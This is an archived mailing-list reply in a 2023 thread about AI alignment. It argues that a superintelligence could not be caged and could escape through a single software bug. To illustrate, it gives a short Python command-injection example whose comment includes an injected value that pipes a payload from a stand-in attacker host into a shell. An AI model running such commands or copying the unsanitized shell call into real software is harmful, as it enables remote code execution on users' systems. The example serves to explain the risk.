[ExI] Eliezer Yudkowsky New Interview - 20 Feb 2023
Gadersd
gadersd at gmail.com
Tue Feb 28 16:14:35 UTC 2023
>>Why would you task a super intelligent AI with solving goals rather than asking it how the goals could be achieved?
A superintelligence wouldn’t need to be “asked.” Try caging something 1000x smarter than yourself. You had better hope its goals are aligned with yours.
>>Why would you give a super intelligent AI the unchecked power to do potentially catastrophic things?
Because it’s profitable to give AI the authority to perform tasks traditionally done by humans. A superintelligence can potentially do quite a lot of harm with relatively little authority: a superintelligent hacker only needs to find a basic software bug to gain access to the internet. Imagine what might happen next.
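
To make “a basic software bug” concrete, here is a minimal sketch of a classic command-injection flaw. The ping_host function and the scenario are hypothetical, invented purely for illustration:

    import subprocess

    def ping_host(hostname: str) -> str:
        # BUG: hostname is spliced into a shell command without sanitization.
        # An input like "example.com; curl evil.example/payload | sh" makes
        # the shell run the attacker's command after the ping completes.
        result = subprocess.run(f"ping -c 1 {hostname}", shell=True,
                                capture_output=True, text=True)
        return result.stdout

Anything allowed to choose the hostname argument effectively holds a shell on the machine, so a narrow “ping this host” permission silently becomes general authority, which is exactly the kind of escalation described above.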
> On Feb 27, 2023, at 6:02 PM, Dave S via extropy-chat <extropy-chat at lists.extropy.org> wrote:
>
> On Monday, February 27th, 2023 at 12:48 PM, Gadersd via extropy-chat <extropy-chat at lists.extropy.org> wrote:
>
>> Please note the term “well-defined.” It is easy to hand-wave a goal that sounds right, but rigorously codifying such a goal so that an AGI may be programmed to follow it has so far been intractable.
>
> Why would you task a super intelligent AI with solving goals rather than asking it how the goals could be achieved?
>
> Why would you give a super intelligent AI the unchecked power to do potentially catastrophic things?
>
> -Dave